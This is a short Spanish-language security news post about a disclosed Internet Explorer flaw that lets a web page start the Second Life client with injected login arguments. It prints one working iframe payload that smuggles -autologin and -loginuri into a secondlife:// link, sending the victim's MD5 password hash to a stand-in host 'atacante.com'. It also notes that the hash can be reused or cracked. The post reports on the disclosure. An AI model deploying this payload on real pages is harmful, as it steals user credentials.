Rynho Zeros Web

Publicidad

GNU Citizen acaba de hacer público un nuevo uso para el ya conocido “bug compartido”, del que Microsoft se lava las manos y asegura no tener nada que ver. En fin, mediante lo publicado por GNU Citizen un atacante puede hacerse con los datos de un usuario de SecondLife sin necesitad de una gran interacción, solo hace falta visitar una web con cierto código utilizando para ello Internet Explorer.

Mediante una llamada a secondlife:// el atacante puede ejecutar el cliente de SecondLife iniciando sesión automáticamente (-autologin) contra la URL especificada por el victimario (-loginuri), de esta forma mediante una llamada XML-RPC uno puede obtener el hash MD5 de la clave del usuario.

<iframe src=’secondlife://" -autologin -loginuri "http://atacante.com/sl/record-login.php’></iframe>

El hash MD5 puede ser utilizado para conectarse a SL con la sesión robada o bien obtener su valor haciendo uso de las rainbow tables.

Enlaces relacionados:

http://www.gnucitizen.org/blog/ie-pwns-secondlife

# Martín Aberastegue
# Rynho Zeros Web (http://www.rzw.com.ar)
# Seguridad Informática

Publicidad

Otros articulos que te pueden interesar

• El robo de identidad afecta, cada año, a 10 millones de americanos
• Crece el robo de identidad en Internet
• McAfee actualiza soluciones contra el robo de identidad
• El alcalde de Nueva York, víctima de robo de identidad
• ¿Argentina a la vanguardia en la prevención del Robo de Identidad?